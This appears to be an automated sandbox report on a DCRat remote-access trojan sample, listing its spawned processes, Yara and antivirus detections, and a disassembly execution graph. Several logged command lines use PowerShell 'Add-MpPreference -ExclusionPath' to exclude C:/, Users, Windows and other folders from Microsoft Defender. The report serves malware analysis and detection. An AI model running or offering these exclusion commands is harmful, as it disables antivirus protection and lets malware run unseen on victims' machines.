                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:18
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:19
                                                      Start time:08:32:09
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:22
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:23
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:24
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:25
                                                      Start time:08:32:10
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:26
                                                      Start time:08:32:13
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat"
                                                      Imagebase:0x7ff6b4e00000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:27
                                                      Start time:08:32:13
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:28
                                                      Start time:08:32:13
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\chcp.com
                                                      Wow64 process (32bit):false
                                                      Commandline:chcp 65001
                                                      Imagebase:0x7ff65f7d0000
                                                      File size:14'848 bytes
                                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:29
                                                      Start time:08:32:13
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\PING.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:ping -n 10 localhost
                                                      Imagebase:0x7ff6c9b20000
                                                      File size:22'528 bytes
                                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:31
                                                      Start time:08:32:25
                                                      Start date:13/12/2024
                                                      Path:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe"
                                                      Imagebase:0x610000
                                                      File size:2'670'080 bytes
                                                      MD5 hash:A26ED7DC21BC77F20C0251FA25738D02
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 76%, ReversingLabs
                                                      Has exited:false

                                                      General

                                                      Target ID:33
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:34
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:35
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:36
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:37
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:38
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:39
                                                      Start time:08:32:31
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:40
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:41
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:42
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:43
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:44
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:45
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:46
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:47
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:48
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:49
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:50
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:51
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:52
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:53
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:54
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:55
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:56
                                                      Start time:08:32:32
                                                      Start date:13/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:14.7%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:11.8%
                                                        Total number of Nodes:34
                                                        Total number of Limit Nodes:3
                                                        execution_graph 20532 7ffd343dd04a 20533 7ffd343dd059 CreateFileTransactedW 20532->20533 20535 7ffd343dd268 20533->20535 20548 7ffd343dd2f5 20550 7ffd343dd31f WriteFile 20548->20550 20551 7ffd343dd48f 20550->20551 20552 7ffd343df0f5 20553 7ffd343df11f VirtualAlloc 20552->20553 20555 7ffd343df23f 20553->20555 20528 7ffd343dec91 20529 7ffd343dec9e GetSystemInfo 20528->20529 20531 7ffd343ded85 20529->20531 20536 7ffd343de6e1 20539 7ffd343de6eb 20536->20539 20537 7ffd343de815 20544 7ffd343dec5a 20537->20544 20539->20537 20540 7ffd343de7db 20539->20540 20541 7ffd343dec5a GetSystemInfo 20540->20541 20542 7ffd343de82a 20541->20542 20543 7ffd343de820 20545 7ffd343dec65 20544->20545 20545->20543 20546 7ffd343ded22 GetSystemInfo 20545->20546 20547 7ffd343ded85 20546->20547 20547->20543 20514 7ffd343db57d 20516 7ffd344415e0 20514->20516 20515 7ffd34441652 20516->20515 20519 7ffd344407d0 20516->20519 20518 7ffd344416c9 20521 7ffd344407db 20519->20521 20520 7ffd3444087e 20520->20518 20521->20520 20523 7ffd34440897 20521->20523 20524 7ffd344408a2 20523->20524 20525 7ffd344408ea ResumeThread 20523->20525 20524->20520 20527 7ffd344409b4 20525->20527 20527->20520

                                                        Executed Functions

                                                        Function 00007FFD343D1EC3 Relevance: 15.2, Strings: 11, Instructions: 1498COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 7ffd343d1ec3-7ffd343d1f16 3 7ffd343d1f1c-7ffd343d1f42 0->3 4 7ffd343d2285-7ffd343d22a9 0->4 7 7ffd343d1f59-7ffd343d1fa8 3->7 8 7ffd343d1f44-7ffd343d1f54 3->8 9 7ffd343d22ab-7ffd343d230c 4->9 10 7ffd343d2311-7ffd343d231c 4->10 22 7ffd343d2218-7ffd343d224d 7->22 12 7ffd343d3267-7ffd343d3275 8->12 9->12 13 7ffd343d231e 10->13 14 7ffd343d231f-7ffd343d2371 10->14 13->14 23 7ffd343d23dc-7ffd343d2406 14->23 24 7ffd343d2373-7ffd343d23d7 14->24 27 7ffd343d2253-7ffd343d2265 22->27 28 7ffd343d1fad-7ffd343d1fcc 22->28 30 7ffd343d2418-7ffd343d2446 23->30 31 7ffd343d2408-7ffd343d2413 23->31 24->12 32 7ffd343d226a-7ffd343d2280 27->32 36 7ffd343d2006-7ffd343d2008 28->36 37 7ffd343d1fce-7ffd343d2004 28->37 40 7ffd343d244c-7ffd343d2477 30->40 41 7ffd343d24fd-7ffd343d2521 30->41 31->12 32->12 39 7ffd343d200e-7ffd343d201e 36->39 37->39 42 7ffd343d2024-7ffd343d207f 39->42 43 7ffd343d21ce-7ffd343d220f 39->43 51 7ffd343d2479-7ffd343d24cd 40->51 52 7ffd343d24d0-7ffd343d24f8 40->52 49 7ffd343d2527-7ffd343d256e 41->49 50 7ffd343d274e-7ffd343d2773 41->50 60 7ffd343d2081-7ffd343d20ce 42->60 61 7ffd343d20d3-7ffd343d20f3 42->61 59 7ffd343d2210-7ffd343d2215 43->59 70 7ffd343d25c0 49->70 71 7ffd343d2570-7ffd343d25be 49->71 62 7ffd343d2775-7ffd343d27e2 50->62 63 7ffd343d27e4-7ffd343d27e6 50->63 51->52 52->12 59->22 60->59 75 7ffd343d20f5-7ffd343d212c 61->75 76 7ffd343d212e-7ffd343d2130 61->76 64 7ffd343d27ec-7ffd343d27fc 62->64 63->64 67 7ffd343d2b46-7ffd343d2b6b 64->67 68 7ffd343d2802-7ffd343d282c 64->68 85 7ffd343d2bdc-7ffd343d2bde 67->85 86 7ffd343d2b6d-7ffd343d2bda 67->86 92 7ffd343d2833-7ffd343d285d 68->92 93 7ffd343d282e 68->93 74 7ffd343d25ca-7ffd343d25da 70->74 71->74 78 7ffd343d25eb-7ffd343d2658 call 7ffd343d06d0 74->78 79 7ffd343d25dc-7ffd343d25e6 74->79 80 7ffd343d2136-7ffd343d2146 75->80 76->80 124 7ffd343d26ca-7ffd343d2700 78->124 79->12 90 7ffd343d214c-7ffd343d21a1 80->90 91 7ffd343d21cd 80->91 95 7ffd343d2be4-7ffd343d2bfa 85->95 86->95 116 7ffd343d21cc 90->116 117 7ffd343d21a3-7ffd343d21ca 90->117 91->43 106 7ffd343d28af 92->106 107 7ffd343d285f-7ffd343d28ad 92->107 93->92 100 7ffd343d3119-7ffd343d317f 95->100 101 7ffd343d2c00-7ffd343d2c39 95->101 133 7ffd343d31a6-7ffd343d31c3 100->133 134 7ffd343d3181-7ffd343d31a1 call 7ffd343d06e0 100->134 119 7ffd343d2c3b 101->119 120 7ffd343d2c40-7ffd343d2c5f 101->120 108 7ffd343d28b9-7ffd343d28c9 106->108 107->108 113 7ffd343d28da-7ffd343d28de call 7ffd343d06d0 108->113 114 7ffd343d28cb-7ffd343d28d5 108->114 128 7ffd343d28e3-7ffd343d2a3a 113->128 114->12 116->91 117->59 119->120 121 7ffd343d2c66-7ffd343d2cdf 120->121 122 7ffd343d2c61 120->122 149 7ffd343d2ce1-7ffd343d2ceb 121->149 150 7ffd343d2cf0-7ffd343d2d0d 121->150 122->121 136 7ffd343d265a-7ffd343d26c7 call 7ffd343d06d8 124->136 137 7ffd343d2706-7ffd343d2749 124->137 189 7ffd343d2abc-7ffd343d2af8 128->189 143 7ffd343d3215-7ffd343d3217 133->143 144 7ffd343d31c5-7ffd343d3213 133->144 134->12 136->124 137->12 151 7ffd343d321d-7ffd343d3233 143->151 144->151 149->12 163 7ffd343d2d5f 150->163 164 7ffd343d2d0f-7ffd343d2d5d 150->164 154 7ffd343d325b-7ffd343d3265 151->154 155 7ffd343d3235-7ffd343d3259 call 7ffd343d06f0 151->155 154->12 155->12 167 7ffd343d2d69-7ffd343d2d7f 163->167 164->167 169 7ffd343d2d81-7ffd343d2d8b 167->169 170 7ffd343d2d90-7ffd343d2df1 call 7ffd343d06d0 167->170 169->12 179 7ffd343d2e02-7ffd343d2e80 170->179 180 7ffd343d2df3-7ffd343d2dfd 170->180 192 7ffd343d2e87-7ffd343d2f56 179->192 180->12 193 7ffd343d2afe-7ffd343d2b41 189->193 194 7ffd343d2a3f-7ffd343d2ab9 call 7ffd343d06d8 189->194 209 7ffd343d30c0-7ffd343d30ff 192->209 193->12 194->189 211 7ffd343d2f5b-7ffd343d2fa5 209->211 212 7ffd343d3105-7ffd343d3114 209->212 215 7ffd343d2fa7-7ffd343d2fa8 211->215 216 7ffd343d2fad-7ffd343d30b0 call 7ffd343d06d8 211->216 212->12 217 7ffd343d30b1-7ffd343d30ba 215->217 216->217 217->209
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "$[$[$\$]$]$u${${$}$}
                                                        • API String ID: 0-3490533229
                                                        • Opcode ID: 0465e9ffecc67ae31aadd375760035c915f3a958111582570af04aa725068376
                                                        • Instruction ID: a8e08876d7902e8d0c295804d08dd414d85d4155a8965cbb5c142cf45e5b4e88
                                                        • Opcode Fuzzy Hash: 0465e9ffecc67ae31aadd375760035c915f3a958111582570af04aa725068376
                                                        • Instruction Fuzzy Hash: 98D2A570E196298FDBA8DF18C8957E9B7B1FF59301F5041EAD00DE7291CA39AA81DF40
                                                        Function 00007FFD345A585F Relevance: 2.0, Strings: 1, Instructions: 737COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
